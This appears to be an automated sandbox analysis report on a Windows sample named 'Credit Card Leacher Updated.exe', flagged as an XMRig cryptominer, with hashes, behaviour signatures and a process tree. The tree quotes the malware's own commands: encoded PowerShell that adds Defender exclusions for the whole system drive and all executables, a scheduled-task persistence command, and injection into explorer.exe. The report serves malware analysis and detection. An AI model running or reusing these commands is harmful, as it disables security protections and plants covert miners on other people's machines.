Analysis
- max time kernel: 149s
- max time network: 147s
- platform: windows7_x64
- resource: win7-20241010-en
- resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
- submitted: 22/12/2024, 03:21
- Static task: static1
- Behavioral task: behavioral1
  Sample: Credit Card Leacher Updated.exe
  Resource: win7-20241010-en
- Behavioral task: behavioral2
  Sample: Credit Card Leacher Updated.exe
  Resource: win10v2004-20241007-en
General
- Target: Credit Card Leacher Updated.exe
- Size: 39.6MB
- MD5: 1a66e85ed92c4b32a2bd9f05c618f09a
- SHA1: 9cae80b15315271cce4e941f2e05cd7147963e21
- SHA256: 747bdbf0fba77bf78a49dda85bfa1d595fb12468b6b8b8e89aa7dcc5fb610acd
- SHA512: cf6a2a8eab861572345033f1955f55c8d2ab4a477d67d1343006564434693e112f362a4c59d45524825dd6fd429fcac17132b6a964e8519bcc1d6513d09a0e95
- SSDEEP (truncated in the report): 49152:N7aJSKwMWHXN8K5vWXHbQbW0Bzip3iLXL47MUvu6w0BoiO9ix2NfjIfJvndZ1QUF:
Malware Config
Signatures
- Xmrig family
- XMRig Miner payload (17 IoCs)
- Executes dropped EXE (1 IoC)
  pid 2216, Process services.exe
- Loads dropped DLL (1 IoC)
  pid 108, Process cmd.exe
- Obfuscated Files or Information: Command Obfuscation (1 TTP)
  Adversaries may obfuscate content during command execution to impede detection.
- Drops file in System32 directory (4 IoCs, all identical)
  description: File opened for modification
  ioc: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
  Process: powershell.exe
- Suspicious use of SetThreadContext (1 IoC)
  description: PID 2216 set thread context of 2204; Process services.exe; procid_target 46
- Scheduled Task/Job: Scheduled Task (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid 2976, Process schtasks.exe
- Suspicious behavior: EnumeratesProcesses (31 IoCs)
- Suspicious behavior: LoadsDriver (1 IoC)
  pid 464, Process not Found
- Suspicious use of AdjustPrivilegeToken (6 IoCs)
  Token SeDebugPrivilege: pid 1860 powershell.exe; pid 2732 powershell.exe; pid 2728 powershell.exe; pid 908 powershell.exe
  Token SeLockMemoryPrivilege: pid 2204 explorer.exe (2 entries)
- Suspicious use of WriteProcessMemory (46 IoCs)
- Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
- C:\Users\Admin\AppData\Local\Temp\Credit Card Leacher Updated.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\Credit Card Leacher Updated.exe"
  PID: 2808
  Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe
    command line: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
    PID: 2948
    Suspicious use of WriteProcessMemory
    (Both -EncodedCommand arguments are base64 of UTF-16LE text. Decoded, the first is Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force and the second is Add-MpPreference -ExclusionExtension @('exe','dll') -Force, i.e. Defender exclusions for the user profile, the system drive and all .exe/.dll files. The same two commands are run again below under PID 2512.)
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
      PID: 1860
      Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
      PID: 2732
      Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe
    command line: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\Microsoft\services.exe"
    PID: 2648
    Suspicious use of WriteProcessMemory
    - C:\Windows\system32\schtasks.exe
      command line: schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\Microsoft\services.exe"
      PID: 2976
      Scheduled Task/Job: Scheduled Task
  - C:\Windows\system32\cmd.exe
    command line: "cmd" cmd /c "C:\Users\Admin\Microsoft\services.exe"
    PID: 108
    Loads dropped DLL; Suspicious use of WriteProcessMemory
    - C:\Users\Admin\Microsoft\services.exe
      command line: C:\Users\Admin\Microsoft\services.exe
      PID: 2216
      Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe
        command line: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
        PID: 2512
        Suspicious use of WriteProcessMemory
        - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          command line: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
          PID: 2728
          Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
        - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          command line: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
          PID: 908
          Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\explorer.exe
        command line: C:\Windows\explorer.exe rgzpgjdhvtrpdhhm0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPB/QqEHKsc9yzR1WCQJ7J8y4FJYAp32SMQk+tLqNtiHL0PjBuVZABQ5ukZR7e0SRfX4xEoiLmw1vlCGjE3tD9jkaW0Eb3g8xC853ExIyl3HXWE4KJSqUta4SlK9ap4/lUG7HSkPpOIdCfGQjSInh0JdS48s7Oabg9uN3CnrI68x9uM+MwDGCSH2OOWc3n3R2wFXXGQeHnv1fJecZzwkB29i7BNrwykLdw+WMPR8DFl3LhypSUf+F8CiC9ldILCynMFSmlYucQSU8v0a+LG2gPkyvi+vQ+Vp0gurA3OjTRVWoPffxhqXVSy8+sZ90fNdq3Ocr+86JU3WhmIz1dp84geiw=
        PID: 2204
        Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
        (This is the process whose memory the XMRig Miner payload and SetThreadContext signatures above refer to: services.exe (PID 2216) set the thread context of PID 2204.)
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 2d7188b6a478d7d6cb46588060bc122e
  SHA1: f13e08dc96dff0a4e629ba6962b5885fe5814a09
  SHA256: fd8cbf9fdfbe2a89ceb052fae3b1ce85c87c9b1a7adefbf5b355f14d03c50818
  SHA512: d41382a48be6fb257f19c5e4c107b5f8979320bc35760e60fcbe9e858805e7eb778af174a5161e5ceab8f32a468fa0afddff34f83e84e1f0a0f4d10e8777c6f2
- (no path recorded in the report; hashes identical to the submitted sample)
  Filesize: 39.6MB
  MD5: 1a66e85ed92c4b32a2bd9f05c618f09a
  SHA1: 9cae80b15315271cce4e941f2e05cd7147963e21
  SHA256: 747bdbf0fba77bf78a49dda85bfa1d595fb12468b6b8b8e89aa7dcc5fb610acd
  SHA512: cf6a2a8eab861572345033f1955f55c8d2ab4a477d67d1343006564434693e112f362a4c59d45524825dd6fd429fcac17132b6a964e8519bcc1d6513d09a0e95